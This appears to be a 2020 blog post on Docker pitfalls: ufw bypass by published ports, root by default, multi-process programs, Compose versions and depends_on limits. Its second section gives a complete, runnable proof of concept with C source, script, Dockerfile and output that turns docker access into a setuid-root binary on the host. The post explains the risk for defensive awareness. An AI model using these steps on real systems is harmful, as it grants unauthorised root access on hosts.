Docker In 2020: Strange Surprises And Unexpected Gotchas

The ability to isolate a given program along with its dependencies has long held the promise of promoting separation of concerns, avoiding conflicts and improving security and deployments.

Docker, in particular, with its large ecosystem and ease of use makes prototyping extremely easy. In fact, you'd be hard-pressed to find a technical post on this site that doesn't also include docker instructions for readers to try the examples for themselves.

That said, despite years of use and improvements there are still surprises and unexpected gotchas that can easily catch people off guard.

1. Docker Bypasses UFW Firewall Rules

Out of the box, if you run docker containers on a system protected by the ufw firewall (Ubuntu/Debian/etc), any ports published by a container will bypass ufw rules on the host. This was noticed back in at least 2017, and is still a problem in 2020.

As a practical example, say you have ufw configured to block all incoming traffic except for SSH. If you then start up a test mysql container and include the -p option so that you can connect to it afterwards, ie :

docker run --name mysql1 -e MYSQL_ROOT_PASSWORD=password -p 3306:3306 -d mysql:latest

Congrats, your new, insecure mysql container is now available to everyone on the network who wants to connect to it, bypassing your otherwise strict ufw rules.

There are workarounds that approach the issue from different angles, from explicitly publishing ports to localhost to disabling dockerd from manipulating iptables, but this is one of the most concerning default behaviors that can expose unprotected services to remote abuse.

2. Leaky Permission Boundaries

If you've given a user the ability to run docker containers on a host, you've given them the ability to become root on that host. This is due to dockerd's default mapping of userids between the container and host. Below is a small proof-of-concept:

become_root.c
-------------

   #include <stdlib.h>
   #include <unistd.h>

   int main(){
     setuid(0);
     system("/usr/bin/whoami");
     return 0;
   }

$ gcc become_root.c -o become_root

$ ./become_root
   ben

prepare.sh
----------
   #!/bin/sh
   cp /become_root /opt/become_root_setuid
   chmod 4755 /opt/become_root_setuid

Dockerfile
----------
   FROM busybox
   COPY prepare.sh  become_root /
   CMD ["/prepare.sh"]

$ docker build --tag setuid .
$ docker run --rm --name test1 --volume "$PWD":/opt setuid

$ ls -l become_root*
   -rw-r--r-- 1 ben  ben    115 Aug 31 22:52 become_root.c       <--- source code
   -rwxr-xr-x 1 ben  ben  16664 Sep  1 09:18 become_root         <--- original program
   -rwsr-xr-x 1 root root 16664 Sep  1 09:33 become_root_setuid  <--- program copy with setuid root

$ ./become_root_setuid
   root

Above the beome_root program attempts to setuid to 0 (root) and then run `whoami` to display the effective userid. Running it locally does not give the user root access since the file is owned by user 'ben' (the setuid bit is also not set but this is irrelevant since setuid runs the program as the file owner, ie 'ben').

To get around this, the program and a small script were added to a minimal docker image in order to copy the become_root program to a shared volume specified at runtime and set the setuid bit. Since dockerd (by default) mirrors the userids from the container to the host for volume I/O, the file is written as root and now has the setuid bit set. This sequence effectively allows any user with the permissions to run a docker container to also create arbitrary programs that will run as root on the host system.

There are efforts to address this such as Rootless mode, however even ignoring its current experimental status, it needs to be explicitly configured and introduces limitations which may not be feasible in your environment.

3. Dockerized Applications Run As Root

Minimizing the number of processes running as root has been an accepted best-practice for a very, very long time. The general idea being that even if a process is successfully compromised, its "blast radius" is confined only to the resources it has access to.

However, without explicitly configuring a Dockerfile to switch to a different user, all dockerized applications will run as root. The American Express Team has a good write-up worth reading if you're unfamiliar with the risk this introduces even when running applications in a containerized environment.

4. Programs Consisting of Multiple Processes

Docker excels when working with a single process, however as noted in the official FAQ, dockerizing programs that consist of multiple processes, though possible, isn't really the best fit with how docker is designed to work.

Postfix is a good example where separation of specific-purpose processes has been central to its operation and security model. (It should be noted that there have been recent changes to ease Postfix's use in container environments, but even with these changes there are still additional aspects to consider).

5. Docker Compose YAML V2 vs V3

Its almost inevitable that you will run across a mix of V2 and V3 docker-compose.yml examples in the wild and wonder what the difference is and which version should you be using.

There is a brief history and overview written in this PR as well as the official documentation, but the TL;DR is that there were structural and directive changes made for the V3 format mainly to support running in Docker Swarm that do not typically apply to the most common docker use-cases. As of this writing you can still use either compose format without issue, however I will note that Docker (the company) recommends V3.

6. Limitations Of Dependency Support In Docker Compose

Another surprise when working with docker-compose comes when trying to establish container dependencies. For example, you wouldn't want your webapp container to start until the backend container it relies on is up and ready to receive connections. Since docker-compose's primary purpose is to define related groups of containers, there is a "depends_on" directive that allows you to define such relationships, but its actual operation leaves much to be desired.

"depends_on" does indeed take dependencies into consideration when starting containers up and shutting them down. However docker-compose only checks if a container's process has started before launching dependent containers, not if it has begun listening on a port or is in any other kind of "ready" state. This results in firing up each container immediately after each other, providing very little dependency-aware value.

The official documentation tries to justify this limitation, but frankly it comes off as a bit of a cop out. Yes, determining a "ready" state may differ from one application to the next, but there are a handful of established methods that will cover the vast majority of use-cases.

Instead, end-users are forced to rely on ugly hacks to workaround this limitation. You can see one such workaround in my RabbitMQ HA post's docker-compose.yml where an additional sleep interval was required to avoid a race condition when the RabbitMQ brokers start up. Alternatively there are numerous "wait-for..." scripts and docker images of varying quality available that aim to provide the functionality missing in the core program.

It looks like there was some work done in the past to integrate health checks with depends_on, however since V3 no longer supports conditional form of depends_on this doesn't appear to be a viable option.

Final Thoughts

As the containerization landscape continues to mature I look forward to improvements both in shipped defaults and in people's awareness of risks and trade-offs involved with different configurations.

Hopefully this post brought to light something that you weren't aware of before and can help better prepare you for improved container management in the future. As always, good luck and happy coding!